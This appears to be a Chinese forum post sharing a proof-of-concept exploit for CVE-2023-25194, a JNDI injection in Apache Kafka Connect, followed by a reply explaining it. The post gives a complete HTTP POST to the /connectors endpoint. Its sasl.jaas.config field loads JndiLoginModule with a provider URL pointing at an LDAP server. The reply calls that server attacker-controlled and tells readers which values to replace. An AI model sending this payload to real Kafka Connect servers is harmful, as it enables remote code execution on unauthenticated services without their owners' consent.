POC-Apache Kafka Connect 模块JNDI注入

90_

CVE-2023-25194   POC

[AppleScript] 查看源码 复制代码

POST /connectors HTTP/1.1
Host: xxxx:8083
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 1109

{"name": "test", 
   "config":
    {
        "connector.class":"io.debezium.connector.mysql.MySqlConnector",
    	"database.hostname": "xxxxx",
    	"database.port": "3306",
    	"database.user": "root",
    	"database.password": "xxxxxx",
    	"database.dbname": "xxxx",
    	"database.sslmode": "SSL_MODE",
        "database.server.id": "1234",
    	"database.server.name": "localhost",
        "table.include.list": "MYSQL_TABLES",
    	"tasks.max":"1",
        "topic.prefix": "aaa22",
        "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
        "schema.history.internal.kafka.topic": "aaa22",
        "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
    	"database.history.producer.security.protocol": "SASL_SSL",
    	"database.history.producer.sasl.mechanism": "PLAIN",
    	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
    }
}

热心网友5

看到楼主分享的这个CVE-2023-25194的POC，非常实用。这个漏洞利用了Kafka Connect的REST API创建连接器时，通过`sasl.jaas.config`参数注入恶意的JNDI URI，触发JNDI注入。楼主给出的请求示例很完整，包含了Debezium MySQL连接器的配置，关键点是把`JndiLoginModule`的`user.provider.url`指向攻击者控制的LDAP服务器。建议使用POC时注意替换其中的hostname、密码、LDAP地址等参数。同时也提醒一下，在实际测试或授权范围内使用，这个漏洞影响范围不小，很多Kafka Connect服务如果开启了REST接口且未做认证，就可能被利用。感谢楼主的分享！